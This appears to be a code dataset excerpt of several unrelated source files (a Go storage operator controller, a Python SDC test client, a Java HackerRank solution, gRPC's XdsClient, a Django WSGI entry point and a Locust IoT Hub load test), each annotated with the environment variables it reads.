nbv1 "github.com/noobaa/noobaa-operator/v2/pkg/apis/noobaa/v1alpha1"
conditionsv1 "github.com/openshift/custom-resource-status/conditions/v1"
"github.com/operator-framework/operator-lib/conditions"
ocsv1 "github.com/red-hat-storage/ocs-operator/api/v1"
"github.com/red-hat-storage/ocs-operator/controllers/util"
cephv1 "github.com/rook/rook/pkg/apis/ceph.rook.io/v1"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/version"
"k8s.io/client-go/kubernetes"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/builder"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/client/config"
"sigs.k8s.io/controller-runtime/pkg/event"
"sigs.k8s.io/controller-runtime/pkg/predicate"
)
var (
log = ctrl.Log.WithName("controllers").WithName("StorageCluster")
)
func (r *StorageClusterReconciler) initializeImageVars() error {
r.images.Ceph = os.Getenv("CEPH_IMAGE")
r.images.NooBaaCore = os.Getenv("NOOBAA_CORE_IMAGE")
r.images.NooBaaDB = os.Getenv("NOOBAA_DB_IMAGE")
if r.images.Ceph == "" {
err := fmt.Errorf("CEPH_IMAGE environment variable not found")
r.Log.Error(err, "Missing CEPH_IMAGE environment variable for ocs initialization.")
return err
} else if r.images.NooBaaCore == "" {
err := fmt.Errorf("NOOBAA_CORE_IMAGE environment variable not found")
r.Log.Error(err, "Missing NOOBAA_CORE_IMAGE environment variable for ocs initialization.")
return err
} else if r.images.NooBaaDB == "" {
err := fmt.Errorf("NOOBAA_DB_IMAGE environment variable not found")
r.Log.Error(err, "Missing NOOBAA_DB_IMAGE environment variable for ocs initialization.")
return err
}
return nil
}
func (r *StorageClusterReconciler) initializeServerVersion() error {
clientset, err := kubernetes.NewForConfig(config.GetConfigOrDie())
if err != nil {
r.Log.Error(err, "Failed creation of clientset for determining serverversion.")
return err
}
r.serverVersion, err = clientset.Discovery().ServerVersion()
if err != nil {
r.Log.Error(err, "Failed getting the serverversion.")
return err
}
return nil
}
// ImageMap holds mapping information between component image name and the image url
type ImageMap struct {
Ceph string
NooBaaCore string
NooBaaDB string
}
// StorageClusterReconciler reconciles a StorageCluster object
//nolint
type StorageClusterReconciler struct {
client.Client
Log logr.Logger
Scheme *runtime.Scheme
serverVersion *version.Info
conditions []conditionsv1.Condition
phase string
nodeCount int
platform *Platform
images ImageMap
recorder *util.EventReporter
OperatorCondition conditions.Condition
IsNoobaaStandalone bool
}
// SetupWithManager sets up a controller with manager
func (r *StorageClusterReconciler) SetupWithManager(mgr ctrl.Manager) error {
if err := r.initializeImageVars(); err != nil {
return err
}
if err := r.initializeServerVersion(); err != nil {
return err
}
r.platform = &Platform{}
r.recorder = util.NewEventReporter(mgr.GetEventRecorderFor("controller_storagecluster"))
// Compose a predicate that is an OR of the specified predicates
scPredicate := util.ComposePredicates(
predicate.GenerationChangedPredicate{},
util.MetadataChangedPredicate{},
)
pvcPredicate := predicate.Funcs{
DeleteFunc: func(e event.DeleteEvent) bool {
// Evaluates to false if the object has been confirmed deleted.
return !e.DeleteStateUnknown
},
}
return ctrl.NewControllerManagedBy(mgr).
For(&ocsv1.StorageCluster{}, builder.WithPredicates(scPredicate)).
Owns(&cephv1.CephCluster{}).
Owns(&nbv1.NooBaa{}).
Owns(&corev1.PersistentVolumeClaim{}, builder.WithPredicates(pvcPredicate)).
Complete(r)
}
| ["\"CEPH_IMAGE\"", "\"NOOBAA_CORE_IMAGE\"", "\"NOOBAA_DB_IMAGE\""] | [] | ["NOOBAA_CORE_IMAGE", "CEPH_IMAGE", "NOOBAA_DB_IMAGE"] | [] | ["NOOBAA_CORE_IMAGE", "CEPH_IMAGE", "NOOBAA_DB_IMAGE"] | go | 3 | 0 | |
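initializeImageVars above fails fast when any of the three image environment variables is unset. The same guard pattern sketched in Python for illustration (the helper itself is hypothetical; only the variable names come from the Go code):

import os

def required_env(*names):
    """Return the values of the given env vars, raising if any is missing."""
    missing = [n for n in names if not os.getenv(n)]
    if missing:
        raise RuntimeError("missing environment variables: %s" % ", ".join(missing))
    return [os.environ[n] for n in names]

# ceph, noobaa_core, noobaa_db = required_env(
#     "CEPH_IMAGE", "NOOBAA_CORE_IMAGE", "NOOBAA_DB_IMAGE")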
examples/ReferenceTest/reference_client.py
|
import time
import traceback
import os
import sdc11073
from collections import defaultdict
from sdc11073 import observableproperties
from sdc11073.definitions_sdc import SDC_v1_Definitions
from concurrent import futures
from sdc11073.certloader import mk_ssl_context_from_folder
adapter_ip = os.getenv('ref_ip') or '127.0.0.1'
ca_folder = os.getenv('ref_ca')
ssl_passwd = os.getenv('ref_ssl_passwd') or None
search_epr = os.getenv('ref_search_epr') or 'abc' # abc is fixed ending in reference_device uuid.
def run_ref_test():
results = []
    print('Test step 1: discover device whose endpoint ends with "{}"'.format(search_epr))
wsd = sdc11073.wsdiscovery.WSDiscoveryWhitelist([adapter_ip])
wsd.start()
my_service = None
while my_service is None:
services = wsd.searchServices(types=SDC_v1_Definitions.MedicalDeviceTypesFilter)
print('found {} services {}'.format(len(services), ', '.join([s.getEPR() for s in services])))
for s in services:
if s.getEPR().endswith(search_epr):
my_service = s
print('found service {}'.format(s.getEPR()))
break
print('Test step 1 successful: device discovered')
results.append('### Test 1 ### passed')
print('Test step 2: connect to device...')
try:
if ca_folder:
ssl_context = mk_ssl_context_from_folder(ca_folder, cyphers_file='client_cyphers.txt',
ssl_passwd=ssl_passwd)
else:
ssl_context = None
client = sdc11073.sdcclient.SdcClient.fromWsdService(my_service,
sslContext=ssl_context)
client.startAll()
print('Test step 2 successful: connected to device')
results.append('### Test 2 ### passed')
except:
print (traceback.format_exc())
results.append('### Test 2 ### failed')
return results
print('Test step 3&4: get mdib and subscribe...')
try:
mdib = sdc11073.mdib.clientmdib.ClientMdibContainer(client)
mdib.initMdib()
print('Test step 3&4 successful')
results.append('### Test 3 ### passed')
results.append('### Test 4 ### passed')
except:
print(traceback.format_exc())
results.append('### Test 3 ### failed')
results.append('### Test 4 ### failed')
return results
print('Test step 5: check that at least one patient context exists')
patients = mdib.contextStates.NODETYPE.get(sdc11073.namespaces.domTag('PatientContextState'), [])
if len(patients) > 0:
print('found {} patients, Test step 5 successful'.format(len(patients)))
results.append('### Test 5 ### passed')
else:
print('found no patients, Test step 5 failed')
results.append('### Test 5 ### failed')
print('Test step 6: check that at least one location context exists')
locations = mdib.contextStates.NODETYPE.get(sdc11073.namespaces.domTag('LocationContextState'), [])
if len(locations) > 0:
print('found {} locations, Test step 6 successful'.format(len(locations)))
results.append('### Test 6 ### passed')
else:
print('found no locations, Test step 6 failed')
results.append('### Test 6 ### failed')
print('Test step 7&8: count metric state updates and alert state updates')
metric_updates = defaultdict(list)
alert_updates = defaultdict(list)
def onMetricUpdates(metricsbyhandle):
print('onMetricUpdates', metricsbyhandle)
for k, v in metricsbyhandle.items():
metric_updates[k].append(v)
def onAlertUpdates(alertsbyhandle):
print('onAlertUpdates', alertsbyhandle)
for k, v in alertsbyhandle.items():
alert_updates[k].append(v)
observableproperties.bind(mdib, metricsByHandle=onMetricUpdates)
observableproperties.bind(mdib, alertByHandle=onAlertUpdates)
sleep_timer = 11
min_updates = sleep_timer // 5 - 1
    print('will wait for {} seconds now, expecting at least {} updates per handle'.format(sleep_timer, min_updates))
time.sleep(sleep_timer)
print(metric_updates)
print(alert_updates)
for k, v in metric_updates.items():
if len(v) < min_updates:
print('found only {} updates for {}, test step 7 failed'.format(len(v), k))
results.append('### Test 7 ### failed')
else:
print('found {} updates for {}, test step 7 ok'.format(len(v), k))
results.append('### Test 7 ### passed')
for k, v in alert_updates.items():
if len(v) < min_updates:
print('found only {} updates for {}, test step 8 failed'.format(len(v), k))
results.append('### Test 8 ### failed')
else:
print('found {} updates for {}, test step 8 ok'.format(len(v), k))
results.append('### Test 8 ### passed')
print('Test step 9: call SetString operation')
setstring_operations = mdib.descriptions.NODETYPE.get(sdc11073.namespaces.domTag('SetStringOperationDescriptor'), [])
setst_handle = 'string.ch0.vmd1_sco_0'
if len(setstring_operations) == 0:
print('Test step 9 failed, no SetString operation found')
results.append('### Test 9 ### failed')
else:
for s in setstring_operations:
if s.handle != setst_handle:
continue
print('setString Op ={}'.format(s))
fut = client.SetService_client.setString(s.handle, 'hoppeldipop')
try:
res = fut.result(timeout=10)
print(res)
if res.state != sdc11073.pmtypes.InvocationState.FINISHED:
print('set string operation {} did not finish with "Fin":{}'.format(s.handle, res))
results.append('### Test 9 ### failed')
else:
print('set value operation {} ok:{}'.format(s.handle, res))
results.append('### Test 9 ### passed')
except futures.TimeoutError:
print('timeout error')
results.append('### Test 9 ### failed')
print('Test step 10: call SetValue operation')
setvalue_operations = mdib.descriptions.NODETYPE.get(sdc11073.namespaces.domTag('SetValueOperationDescriptor'), [])
# print('setvalue_operations', setvalue_operations)
setval_handle = 'numeric.ch0.vmd1_sco_0'
if len(setvalue_operations) == 0:
print('Test step 10 failed, no SetValue operation found')
results.append('### Test 10 ### failed')
else:
for s in setvalue_operations:
if s.handle != setval_handle:
continue
print('setNumericValue Op ={}'.format(s))
fut = client.SetService_client.setNumericValue(s.handle, 42)
try:
res = fut.result(timeout=10)
print(res)
if res.state != sdc11073.pmtypes.InvocationState.FINISHED:
print('set value operation {} did not finish with "Fin":{}'.format(s.handle, res))
else:
print('set value operation {} ok:{}'.format(s.handle, res))
results.append('### Test 10 ### passed')
except futures.TimeoutError:
print('timeout error')
results.append('### Test 10 ### failed')
return results
if __name__ == '__main__':
results = run_ref_test()
for r in results:
print(r)
| [] | [] | ["ref_ip", "ref_ca", "ref_ssl_passwd", "ref_search_epr"] | [] | ["ref_ip", "ref_ca", "ref_ssl_passwd", "ref_search_epr"] | python | 4 | 0 | |
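Steps 7 and 8 above derive the expected report count from the wait time as min_updates = sleep_timer // 5 - 1, which implies a nominal 5-second update period (the period itself is only implied by the formula, not stated in the script). A one-line check of that arithmetic:

for sleep_timer in (11, 30, 60):
    print(sleep_timer, "->", sleep_timer // 5 - 1)   # 11 -> 1, 30 -> 5, 60 -> 11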
Algorithms/Implementation/Picking_Numbers.java
|
import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.function.*;
import java.util.regex.*;
import java.util.stream.*;
import static java.util.stream.Collectors.joining;
import static java.util.stream.Collectors.toList;
class Result {
public static int pickingNumbers(List<Integer> numbers) {
Collections.sort(numbers);
        // Sliding window over the sorted list: [windowStart, i] only ever spans
        // values that differ by at most 1. (Anchoring the count on the first
        // element of each run, as the previous greedy did, undercounted inputs
        // such as [1, 2, 2, 3, 3, 3], where the answer is 5.)
        int windowStart = 0;
        int maxOneAwayCount = 1;
        for (int i = 1; i < numbers.size(); i++) {
            while (numbers.get(i) - numbers.get(windowStart) > 1) {
                windowStart++;
            }
            maxOneAwayCount = Math.max(maxOneAwayCount, i - windowStart + 1);
        }
        return maxOneAwayCount;
}
}
public class Solution {
public static void main(String[] args) throws IOException {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(System.in));
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter(System.getenv("OUTPUT_PATH")));
int n = Integer.parseInt(bufferedReader.readLine().trim());
List<Integer> a = Stream.of(bufferedReader.readLine().replaceAll("\\s+$", "").split(" "))
.map(Integer::parseInt)
.collect(toList());
int result = Result.pickingNumbers(a);
bufferedWriter.write(String.valueOf(result));
bufferedWriter.newLine();
bufferedReader.close();
bufferedWriter.close();
}
}
| ["\"OUTPUT_PATH\""] | [] | ["OUTPUT_PATH"] | [] | ["OUTPUT_PATH"] | java | 1 | 0 | |
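An equivalent way to state the task solved above: for each value v, count the elements equal to v or v+1 and take the maximum. A short Python cross-check of the sorted-window solution (illustrative, not the HackerRank harness):

from collections import Counter

def picking_numbers(values):
    freq = Counter(values)
    return max(freq[v] + freq[v + 1] for v in freq)

print(picking_numbers([1, 2, 2, 3, 3, 3]))  # 5
print(picking_numbers([4, 6, 5, 3, 3, 1]))  # 3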
xds/src/main/java/io/grpc/xds/XdsClient.java
|
/*
* Copyright 2019 The gRPC Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.grpc.xds;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkState;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.MoreObjects;
import com.google.common.base.Preconditions;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;
import io.grpc.Status;
import io.grpc.alts.GoogleDefaultChannelBuilder;
import io.grpc.internal.ObjectPool;
import io.grpc.xds.Bootstrapper.ChannelCreds;
import io.grpc.xds.Bootstrapper.ServerInfo;
import io.grpc.xds.EnvoyProtoData.DropOverload;
import io.grpc.xds.EnvoyProtoData.Locality;
import io.grpc.xds.EnvoyProtoData.LocalityLbEndpoints;
import io.grpc.xds.EnvoyProtoData.Route;
import io.grpc.xds.EnvoyServerProtoData.Listener;
import io.grpc.xds.EnvoyServerProtoData.UpstreamTlsContext;
import io.grpc.xds.XdsLogger.XdsLogLevel;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.TimeUnit;
import javax.annotation.Nullable;
/**
* An {@link XdsClient} instance encapsulates all of the logic for communicating with the xDS
* server. It may create multiple RPC streams (or a single ADS stream) for a series of xDS
* protocols (e.g., LDS, RDS, VHDS, CDS and EDS) over a single channel. Watch-based interfaces
* are provided for each set of data needed by gRPC.
*/
abstract class XdsClient {
/**
* Data class containing the results of performing a series of resource discovery RPCs via
* LDS/RDS/VHDS protocols. The results may include configurations for path/host rewriting,
* traffic mirroring, retry or hedging, default timeouts and load balancing policy that will
* be used to generate a service config.
*/
static final class ConfigUpdate {
private final List<Route> routes;
private ConfigUpdate(List<Route> routes) {
this.routes = routes;
}
List<Route> getRoutes() {
return routes;
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("routes", routes)
.toString();
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private final List<Route> routes = new ArrayList<>();
// Use ConfigUpdate.newBuilder().
private Builder() {
}
Builder addRoutes(Collection<Route> route) {
routes.addAll(route);
return this;
}
ConfigUpdate build() {
checkState(!routes.isEmpty(), "routes is empty");
return new ConfigUpdate(Collections.unmodifiableList(routes));
}
}
}
/**
* Data class containing the results of performing a resource discovery RPC via CDS protocol.
* The results include configurations for a single upstream cluster, such as endpoint discovery
* type, load balancing policy, connection timeout and etc.
*/
static final class ClusterUpdate {
private final String clusterName;
@Nullable
private final String edsServiceName;
private final String lbPolicy;
@Nullable
private final String lrsServerName;
private final UpstreamTlsContext upstreamTlsContext;
private ClusterUpdate(
String clusterName,
@Nullable String edsServiceName,
String lbPolicy,
@Nullable String lrsServerName,
@Nullable UpstreamTlsContext upstreamTlsContext) {
this.clusterName = clusterName;
this.edsServiceName = edsServiceName;
this.lbPolicy = lbPolicy;
this.lrsServerName = lrsServerName;
this.upstreamTlsContext = upstreamTlsContext;
}
String getClusterName() {
return clusterName;
}
/**
* Returns the resource name for EDS requests.
*/
@Nullable
String getEdsServiceName() {
return edsServiceName;
}
/**
* Returns the policy of balancing loads to endpoints. Only "round_robin" is supported
* as of now.
*/
String getLbPolicy() {
return lbPolicy;
}
/**
* Returns the server name to send client load reports to if LRS is enabled. {@code null} if
* load reporting is disabled for this cluster.
*/
@Nullable
String getLrsServerName() {
return lrsServerName;
}
/** Returns the {@link UpstreamTlsContext} for this cluster if present, else null. */
@Nullable
UpstreamTlsContext getUpstreamTlsContext() {
return upstreamTlsContext;
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("clusterName", clusterName)
.add("edsServiceName", edsServiceName)
.add("lbPolicy", lbPolicy)
.add("lrsServerName", lrsServerName)
.add("upstreamTlsContext", upstreamTlsContext)
.toString();
}
@Override
public int hashCode() {
return Objects.hash(
clusterName, edsServiceName, lbPolicy, lrsServerName, upstreamTlsContext);
}
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
ClusterUpdate that = (ClusterUpdate) o;
return Objects.equals(clusterName, that.clusterName)
&& Objects.equals(edsServiceName, that.edsServiceName)
&& Objects.equals(lbPolicy, that.lbPolicy)
&& Objects.equals(lrsServerName, that.lrsServerName)
&& Objects.equals(upstreamTlsContext, that.upstreamTlsContext);
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private String clusterName;
@Nullable
private String edsServiceName;
private String lbPolicy;
@Nullable
private String lrsServerName;
@Nullable
private UpstreamTlsContext upstreamTlsContext;
// Use ClusterUpdate.newBuilder().
private Builder() {
}
Builder setClusterName(String clusterName) {
this.clusterName = clusterName;
return this;
}
Builder setEdsServiceName(String edsServiceName) {
this.edsServiceName = edsServiceName;
return this;
}
Builder setLbPolicy(String lbPolicy) {
this.lbPolicy = lbPolicy;
return this;
}
Builder setLrsServerName(String lrsServerName) {
this.lrsServerName = lrsServerName;
return this;
}
Builder setUpstreamTlsContext(UpstreamTlsContext upstreamTlsContext) {
this.upstreamTlsContext = upstreamTlsContext;
return this;
}
ClusterUpdate build() {
checkState(clusterName != null, "clusterName is not set");
checkState(lbPolicy != null, "lbPolicy is not set");
return
new ClusterUpdate(
clusterName, edsServiceName, lbPolicy, lrsServerName, upstreamTlsContext);
}
}
}
/**
* Data class containing the results of performing a resource discovery RPC via EDS protocol.
* The results include endpoint addresses running the requested service, as well as
* configurations for traffic control such as drop overloads, inter-cluster load balancing
* policy and etc.
*/
static final class EndpointUpdate {
private final String clusterName;
private final Map<Locality, LocalityLbEndpoints> localityLbEndpointsMap;
private final List<DropOverload> dropPolicies;
private EndpointUpdate(
String clusterName,
Map<Locality, LocalityLbEndpoints> localityLbEndpoints,
List<DropOverload> dropPolicies) {
this.clusterName = clusterName;
this.localityLbEndpointsMap = localityLbEndpoints;
this.dropPolicies = dropPolicies;
}
static Builder newBuilder() {
return new Builder();
}
String getClusterName() {
return clusterName;
}
/**
* Returns a map of localities with endpoints load balancing information in each locality.
*/
Map<Locality, LocalityLbEndpoints> getLocalityLbEndpointsMap() {
return Collections.unmodifiableMap(localityLbEndpointsMap);
}
/**
* Returns a list of drop policies to be applied to outgoing requests.
*/
List<DropOverload> getDropPolicies() {
return Collections.unmodifiableList(dropPolicies);
}
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
EndpointUpdate that = (EndpointUpdate) o;
return Objects.equals(clusterName, that.clusterName)
&& Objects.equals(localityLbEndpointsMap, that.localityLbEndpointsMap)
&& Objects.equals(dropPolicies, that.dropPolicies);
}
@Override
public int hashCode() {
return Objects.hash(clusterName, localityLbEndpointsMap, dropPolicies);
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("clusterName", clusterName)
.add("localityLbEndpointsMap", localityLbEndpointsMap)
.add("dropPolicies", dropPolicies)
.toString();
}
static final class Builder {
private String clusterName;
private Map<Locality, LocalityLbEndpoints> localityLbEndpointsMap = new LinkedHashMap<>();
private List<DropOverload> dropPolicies = new ArrayList<>();
// Use EndpointUpdate.newBuilder().
private Builder() {
}
Builder setClusterName(String clusterName) {
this.clusterName = clusterName;
return this;
}
Builder addLocalityLbEndpoints(Locality locality, LocalityLbEndpoints info) {
localityLbEndpointsMap.put(locality, info);
return this;
}
Builder addDropPolicy(DropOverload policy) {
dropPolicies.add(policy);
return this;
}
EndpointUpdate build() {
checkState(clusterName != null, "clusterName is not set");
return
new EndpointUpdate(
clusterName,
ImmutableMap.copyOf(localityLbEndpointsMap),
ImmutableList.copyOf(dropPolicies));
}
}
}
/**
* Updates via resource discovery RPCs using LDS. Includes {@link Listener} object containing
* config for security, RBAC or other server side features such as rate limit.
*/
static final class ListenerUpdate {
// TODO(sanjaypujare): flatten structure by moving Listener class members here.
private final Listener listener;
private ListenerUpdate(Listener listener) {
this.listener = listener;
}
public Listener getListener() {
return listener;
}
@Override
public String toString() {
return MoreObjects.toStringHelper(this)
.add("listener", listener)
.toString();
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private Listener listener;
// Use ListenerUpdate.newBuilder().
private Builder() {
}
Builder setListener(Listener listener) {
this.listener = listener;
return this;
}
ListenerUpdate build() {
checkState(listener != null, "listener is not set");
return new ListenerUpdate(listener);
}
}
}
/**
* Watcher interface for a single requested xDS resource.
*/
private interface ResourceWatcher {
/**
* Called when the resource discovery RPC encounters some transient error.
*/
void onError(Status error);
/**
* Called when the requested resource is not available.
*
* @param resourceName name of the resource requested in discovery request.
*/
void onResourceDoesNotExist(String resourceName);
}
/**
* Config watcher interface. To be implemented by the xDS resolver.
*/
interface ConfigWatcher extends ResourceWatcher {
/**
* Called when receiving an update on virtual host configurations.
*/
void onConfigChanged(ConfigUpdate update);
}
/**
* Cluster watcher interface.
*/
interface ClusterWatcher extends ResourceWatcher {
void onClusterChanged(ClusterUpdate update);
}
/**
* Endpoint watcher interface.
*/
interface EndpointWatcher extends ResourceWatcher {
void onEndpointChanged(EndpointUpdate update);
}
/**
* Listener watcher interface. To be used by {@link io.grpc.xds.internal.sds.XdsServerBuilder}.
*/
interface ListenerWatcher extends ResourceWatcher {
/**
* Called when receiving an update on Listener configuration.
*/
void onListenerChanged(ListenerUpdate update);
}
/**
* Shutdown this {@link XdsClient} and release resources.
*/
abstract void shutdown();
/**
* Registers a watcher to receive {@link ConfigUpdate} for service with the given target
* authority.
*
* <p>Unlike watchers for cluster data and endpoint data, at most one ConfigWatcher can be
* registered. Once it is registered, it cannot be unregistered.
*
* @param targetAuthority authority of the "xds:" URI for the server name that the gRPC client
* targets for.
* @param watcher the {@link ConfigWatcher} to receive {@link ConfigUpdate}.
*/
void watchConfigData(String targetAuthority, ConfigWatcher watcher) {
}
/**
* Registers a data watcher for the given cluster.
*/
void watchClusterData(String clusterName, ClusterWatcher watcher) {
}
/**
* Unregisters the given cluster watcher, which was registered to receive updates for the
* given cluster.
*/
void cancelClusterDataWatch(String clusterName, ClusterWatcher watcher) {
}
/**
* Registers a data watcher for endpoints in the given cluster.
*/
void watchEndpointData(String clusterName, EndpointWatcher watcher) {
}
/**
* Unregisters the given endpoints watcher, which was registered to receive updates for
* endpoints information in the given cluster.
*/
void cancelEndpointDataWatch(String clusterName, EndpointWatcher watcher) {
}
/**
* Registers a watcher for a Listener with the given port.
*/
void watchListenerData(int port, ListenerWatcher watcher) {
}
/**
* Report client load stats to a remote server for the given cluster:cluster_service.
*
* <p>Note: currently we can only report loads for a single cluster:cluster_service,
* as the design for adding clusters to report loads for while load reporting is
* happening is undefined.
*/
void reportClientStats(
String clusterName, @Nullable String clusterServiceName, LoadStatsStore loadStatsStore) {
throw new UnsupportedOperationException();
}
/**
* Stops reporting client load stats to the remote server for the given cluster:cluster_service.
*/
void cancelClientStatsReport(String clusterName, @Nullable String clusterServiceName) {
}
abstract static class XdsClientFactory {
abstract XdsClient createXdsClient();
}
/**
* An {@link ObjectPool} holding reference and ref-count of an {@link XdsClient} instance.
* Initially the instance is null and the ref-count is zero. {@link #getObject()} will create a
* new XdsClient instance if the ref-count is zero when calling the method. {@code #getObject()}
* increments the ref-count and {@link #returnObject(Object)} decrements it. Anytime when the
* ref-count gets back to zero, the XdsClient instance will be shutdown and de-referenced.
*/
static final class RefCountedXdsClientObjectPool implements ObjectPool<XdsClient> {
private final XdsClientFactory xdsClientFactory;
@VisibleForTesting
@Nullable
XdsClient xdsClient;
private int refCount;
RefCountedXdsClientObjectPool(XdsClientFactory xdsClientFactory) {
this.xdsClientFactory = Preconditions.checkNotNull(xdsClientFactory, "xdsClientFactory");
}
/**
* See {@link RefCountedXdsClientObjectPool}.
*/
@Override
public synchronized XdsClient getObject() {
if (xdsClient == null) {
checkState(
refCount == 0,
"Bug: refCount should be zero while xdsClient is null");
xdsClient = xdsClientFactory.createXdsClient();
}
refCount++;
return xdsClient;
}
/**
* See {@link RefCountedXdsClientObjectPool}.
*/
@Override
public synchronized XdsClient returnObject(Object object) {
checkState(
object == xdsClient,
"Bug: the returned object '%s' does not match current XdsClient '%s'",
object,
xdsClient);
refCount--;
checkState(refCount >= 0, "Bug: refCount of XdsClient less than 0");
if (refCount == 0) {
xdsClient.shutdown();
xdsClient = null;
}
return null;
}
}
/**
* Factory for creating channels to xDS severs.
*/
abstract static class XdsChannelFactory {
@VisibleForTesting
static boolean experimentalV3SupportEnvVar = Boolean.parseBoolean(
System.getenv("GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"));
private static final String XDS_V3_SERVER_FEATURE = "xds_v3";
private static final XdsChannelFactory DEFAULT_INSTANCE = new XdsChannelFactory() {
/**
* Creates a channel to the first server in the given list.
*/
@Override
XdsChannel createChannel(List<ServerInfo> servers) {
checkArgument(!servers.isEmpty(), "No management server provided.");
XdsLogger logger = XdsLogger.withPrefix("xds-client-channel-factory");
ServerInfo serverInfo = servers.get(0);
String serverUri = serverInfo.getServerUri();
logger.log(XdsLogLevel.INFO, "Creating channel to {0}", serverUri);
List<ChannelCreds> channelCredsList = serverInfo.getChannelCredentials();
ManagedChannelBuilder<?> channelBuilder = null;
// Use the first supported channel credentials configuration.
// Currently, only "google_default" is supported.
for (ChannelCreds creds : channelCredsList) {
if (creds.getType().equals("google_default")) {
logger.log(XdsLogLevel.INFO, "Using channel credentials: google_default");
channelBuilder = GoogleDefaultChannelBuilder.forTarget(serverUri);
break;
}
}
if (channelBuilder == null) {
logger.log(XdsLogLevel.INFO, "Using default channel credentials");
channelBuilder = ManagedChannelBuilder.forTarget(serverUri);
}
ManagedChannel channel = channelBuilder
.keepAliveTime(5, TimeUnit.MINUTES)
.build();
boolean useProtocolV3 = experimentalV3SupportEnvVar
&& serverInfo.getServerFeatures().contains(XDS_V3_SERVER_FEATURE);
return new XdsChannel(channel, useProtocolV3);
}
};
static XdsChannelFactory getInstance() {
return DEFAULT_INSTANCE;
}
/**
* Creates a channel to one of the provided management servers.
*/
abstract XdsChannel createChannel(List<ServerInfo> servers);
}
static final class XdsChannel {
private final ManagedChannel managedChannel;
private final boolean useProtocolV3;
@VisibleForTesting
XdsChannel(ManagedChannel managedChannel, boolean useProtocolV3) {
this.managedChannel = managedChannel;
this.useProtocolV3 = useProtocolV3;
}
ManagedChannel getManagedChannel() {
return managedChannel;
}
boolean isUseProtocolV3() {
return useProtocolV3;
}
}
}
| ["\"GRPC_XDS_EXPERIMENTAL_V3_SUPPORT\""] | [] | ["GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"] | [] | ["GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"] | java | 1 | 0 | |
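RefCountedXdsClientObjectPool above is documented to create the client on the first getObject, count references, and shut the instance down once the count returns to zero. A compact Python sketch of that contract (a stand-in, not the gRPC implementation):

import threading

class RefCountedPool:
    def __init__(self, factory):
        self._factory = factory
        self._lock = threading.Lock()
        self._obj = None
        self._refs = 0

    def get_object(self):
        with self._lock:
            if self._obj is None:
                assert self._refs == 0
                self._obj = self._factory()
            self._refs += 1
            return self._obj

    def return_object(self, obj):
        with self._lock:
            assert obj is self._obj and self._refs > 0
            self._refs -= 1
            if self._refs == 0:
                self._obj.shutdown()   # the factory product is assumed to expose shutdown()
                self._obj = None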
example/wsgi.py
|
import os
import sys
webapp_dir = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.abspath(os.path.join(webapp_dir, os.path.pardir))
VENV = os.path.join(PATH, 'venv')
if PATH not in sys.path:
sys.path.insert(0, PATH)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "example.settings")
activate_this = os.path.expanduser(os.path.join(VENV, "bin", "activate_this.py"))
execfile(activate_this, dict(__file__=activate_this))
#from django.core.wsgi import get_wsgi_application
#application = get_wsgi_application()
from django.core.handlers.wsgi import WSGIHandler
application = WSGIHandler()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
load_tests/tests/locustfile_burst.py
|
import time,datetime, json, uuid, random, string, os
from locust import HttpUser, task, between,constant
from random import randint
class QuickstartUser(HttpUser):
wait_time = constant(0)
IoTHubName = os.getenv("IOT_HUB_NAME")
host = "https://" + IoTHubName + ".azure-devices.net/"
@task
def view_item(self):
deviceID = "BXConnector"
IoTHubSASToken = os.getenv("IOT_HUB_SAS_TOKEN")
# RestAPI Version
iotHubAPIVer = "2018-04-01"
target = "/devices/" + deviceID + "/messages/events?api-version=" + iotHubAPIVer
# Headers
Headers = {}
Headers['Authorization'] = IoTHubSASToken
Headers['Content-Type'] = "application/json"
# Message Payload
current_datetime = datetime.datetime.now()
body = {}
body['messageId'] = str(uuid.uuid4())
# Generate a random string of the form 'A35' etc
body['AssetName'] = random.choice(string.ascii_uppercase) + str(randint(10,99))
body['AssetPath'] = "Campus\\Bldg\\Device\\Sensor\\AssetName"
body['FaultName'] = "FSCFault"
body['FaultActiveTime'] = str(current_datetime)
body['MessageSource'] = "ICONICS FDD"
body['FaultCostValue'] = "FaultCostNumeric"
json_fault_msg = json.dumps(body)
# Send Message
resp = self.client.post(
target,
data=json_fault_msg,
auth=None,
headers=Headers,
name="BXConnectorRequest",
)
time.sleep(2.5)
